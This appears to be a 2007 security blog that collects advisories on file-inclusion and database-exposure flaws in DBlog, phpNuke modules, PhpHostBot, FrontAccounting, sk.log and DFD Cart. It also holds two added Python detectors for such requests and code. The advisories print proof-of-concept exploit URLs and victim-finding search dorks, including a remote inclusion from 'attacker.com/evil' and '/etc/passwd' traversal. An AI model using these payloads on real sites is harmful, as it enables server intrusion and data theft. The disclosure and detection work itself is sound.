Author: Janek Vind "waraxe"
Date: 19. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-52.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.dblog.it/sito/default.asp
DBlog CMS is an open source Content Management System for IIS/ASP platform.
Some days ago dBlog 2.0 hit the goal of the 110.000 platform downloads,
over 100.000 of them regarding the latest version.
GoogleDork: inurl:"articolo.asp" "powered by dblog"
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DBlog stores all the data in JET database file with default name "dblog.mdb".
This database file is accessible from web as:
http://www.example.com/mdb-database/dblog.mdb
By fetching database anyone can obtain admin password sha hashes and then try to
crack them and gain admin privileges.
There are some mitigating factors though:
1. IIS webserver can refuse ".mdb" file download
2. database file or directory can be renamed to something else
Quick look @ real world sites shows, that ~ 20% of them are exploitable.
Considering large number of DBlog-based websites, this is serious problem IMHO.
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IIS directory restrictions, renaming directory and database file.
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to pabloski, ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and all other people who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
Wednesday, September 26, 2007
Local File Inclusion in Dance Music module for phpNuke
Author: Janek Vind "waraxe"
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails
&lid=251&title=Dance%20Music%20for%20PHP-Nuke
Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com
Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Let's take a peek at source code of "index.php":
------------>[source code]<------------
include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");
------------>[/source code]<-----------
As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there
arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"
is active.
Proof-of-concept test:
http://victim.com/modules.php?name=Dance_Music-MM&page=1
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd
Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd
) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154
So local file inclusion exists, but safe mode can make exploiting harder.
//-----> See ya soon and have a nice day ;) <-----//
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------
[ECHO_ADV_83$2007] PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------
Author : M.Hasran Addahroni
Date : August, 4 th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv83-K-159-2007.txt
Critical Lvl : Dangerous
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : PhpHostBot
version : <= 1.06
Vendor : http://www.idevspot.com/PhpHostBot.php
Description :
PhpHostBot is a webware PHP application which integrates with the popular Cpanel(WHM) web hosting control panel.
PhpHostBot supports Paypal subscriptions, free web hosting, Subdomain and Reseller account setup
and supports both dedicated server and Reseller web hosting companies
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local or external resources.
Successful exploitation requires that "register_globals" is enabled.
Poc/Exploit:
~~~~~~~~~~
http://www.target.com/[PhpHostBot-path]/order/login.php?svr_rootscript=http://attacker.com/evil?
Google Dork:
~~~~~~~~~~~
"order?page=plan_show"
Solution:
~~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn off register_globals
- use the latest version
Timeline:
~~~~~~~~~
- 27-07-2007 bug found
- 4-08-2007 vendor contacted
- 7-08-2007 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zautha my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~
K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
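Added example, not part of the advisories above: a log check for the two request shapes shown in the PhpHostBot and Dance Music proof-of-concept URLs, that is, a query parameter whose value is itself a URL, and a parameter (including array-style names such as ACCEPT_FILE[1]) carrying "../" components. The sample log lines, hosts and paths are constructed placeholders, and combined log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)   # value is itself a URL
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')      # "../" as a path component

def classify(value):
    """Label one decoded parameter value, or return None if it looks ordinary."""
    if SCHEME.match(value):
        return "url-in-parameter"
    if TRAVERSAL.search(value):
        return "path-traversal"
    return None

def suspicious_params(log_line):
    """Return [(parameter_name, kind)] for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    hits = []
    # parse_qsl percent-decodes once, so "..%2F" is seen as "../".
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        kind = classify(value)
        if kind:
            hits.append((name, kind))
    return hits

# Constructed sample lines; hosts, paths and addresses are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Aug/2007:10:00:01 +0000] "GET /shop/order/login.php?svr_rootscript=http://remote.example/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [25/Sep/2007:11:12:13 +0000] "GET /modules.php?name=Dance_Music-MM&page=1&ACCEPT_FILE[1]=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '192.0.2.12 - - [25/Sep/2007:11:15:00 +0000] "GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=251 HTTP/1.1" 200 4096',
]

def scan(lines):
    """Return [(line_index, hits)] for the lines that have at least one hit."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := suspicious_params(line))]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(index, hits)
```

Redirect and callback parameters legitimately carry URLs, so the "url-in-parameter" label needs an allow-list of parameter names per application before it is used for alerting.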
FrontAccounting version 1.13 <= Remote File Inclusion Vulnerability
#
#Dork:"FrontAccounting"
#
#Vuln Code
##############################################################################################
#
#ERROR1:accsess/login.php
#
# include_once($path_to_root . "/includes/ui/ui_view.inc"); <<< RFI
#
#
#
#
#BUG1:login.php?path_to_root
#
#Example1:http://site.com/path/accsess/login.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
##############################################################################################
#
#ERROR2:includes/lang/language.php
#
# include_once($path_to_root . "/lang/installed_languages.inc");
# include_once($path_to_root . "/includes/lang/gettext.php"); <<< RFI
#
#
#
#
#BUG2:includes/lang/language.php?path_to_root
#
#Example2:http://site.com/path/includes/lang/language.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
#
#http://sourceforge.net/projects/frontaccounting/
#
##############################################################################################
#
#>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<
#
#"Eli mouse tutan herkes kendini haykır zannedio."----------------"Eli opulcek cok insan var."
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################
# milw0rm.com [2007-09-26]
Tuesday, September 25, 2007
Nuke Mobile Entertainment Local File Inclusion
-----------------------------------------------
# Found by Seph1roth
# http://blackroots.it
-----------------------------------------------
# Vulnerable script download
http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip
# Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]
# This is the vulnerable code :
# include 'modules/'.$module_name.'compatibility/data/marque.data.php';
sk.log v0.5.3 Remote File Inclusion
++++++++++++++++++++++++++++++++++++++++++++++++++
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it
++++++++++++++++++++++++++++++++++++++++++++++++++
http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip
+ Vulnerable Code
+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );
+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]
Sunday, September 23, 2007
DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities
Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/product.control.config.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 32
Lines:
----------------------------------------------
require ("".$set_depth."app.lib/product.control/core.php/functions.php");
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 179
Lines:
----------------------------------------------
$category_html = 'form_select';
require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
?>
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 154
Lines:
----------------------------------------------
$category_html = 'form_select';
require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
?>
----------------------------------------------
Multiple Remote Vulnerabilities
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke
FoUnD By BiNgZa
DoRk: :(
shadowcrew@hotmail.co.uk
http://shadow.wizhoo.com/
# milw0rm.com [2007-09-24]
Comment: PHP injection still booming.. beware with your PHP script
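Added example, not code from any of the advisories or projects above: a small source audit for the pattern these posts share, an include/require path built from a variable that the script never assigns as a whole, so register_globals can fill it from the request. It covers both the plain case (DFD Cart's $set_depth) and the Dance Music case, where $ACCEPT_FILE only ever receives element writes. The regexes are a heuristic and not a PHP parser, only one file is examined, and the sample inputs are constructed from the snippets quoted in the posts.

```python
import re

INCLUDE = re.compile(r'\b(?:include|require)(?:_once)?\b\s*(.+?);', re.S)
# "$name = ..." only; "$name[...] = ..." (element write), "==" and "=>" do not match.
ASSIGN = re.compile(r'\$(\w+)\s*=(?![=>])\s*(.+?);', re.S)
VAR = re.compile(r'\$(\w+)')
SUPERGLOBALS = {"_GET", "_POST", "_COOKIE", "_REQUEST", "_SERVER", "_FILES", "GLOBALS"}

def _roots(name, assigned, seen):
    """Follow assignments back to variables that were never assigned as a whole."""
    if name in SUPERGLOBALS or name in seen:
        return set()
    seen.add(name)
    if name not in assigned:
        return {name}
    found = set()
    for rhs in assigned[name]:
        for var in VAR.findall(rhs):
            found |= _roots(var, assigned, seen)
    return found

def seedable_includes(php_source):
    """Return [(include_expression, sorted_variable_names)] for every include/require
    whose path depends on a variable register_globals could pre-populate."""
    findings = []
    for inc in INCLUDE.finditer(php_source):
        assigned = {}
        for m in ASSIGN.finditer(php_source[:inc.start()]):
            assigned.setdefault(m.group(1), []).append(m.group(2))
        seedable = set()
        for var in VAR.findall(inc.group(1)):
            seedable |= _roots(var, assigned, set())
        if seedable:
            findings.append((inc.group(1).strip(), sorted(seedable)))
    return findings

# Constructed inputs assembled from the snippets quoted in the advisories.
DANCE_MUSIC = r'''
include("header.php");
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$page = $_GET['page'];
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");
'''
DANCE_MUSIC_FIXED = DANCE_MUSIC.replace("$ACCEPT_FILE['Acid", "$ACCEPT_FILE = array();\n$ACCEPT_FILE['Acid")
DFD_CART = r'''require ("".$set_depth."app.lib/product.control/core.php/functions.php");'''

if __name__ == "__main__":
    print(seedable_includes(DANCE_MUSIC), seedable_includes(DANCE_MUSIC_FIXED), seedable_includes(DFD_CART))
```

The DANCE_MUSIC_FIXED input shows the one-line repair for that script: assigning `$ACCEPT_FILE = array();` before the element writes leaves nothing for the request to seed, and the finding disappears.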
Introduction
Hi all, this blog is used to collect internet security posts from other sites. Enjoy it here, and you don't need to open many pages. :D
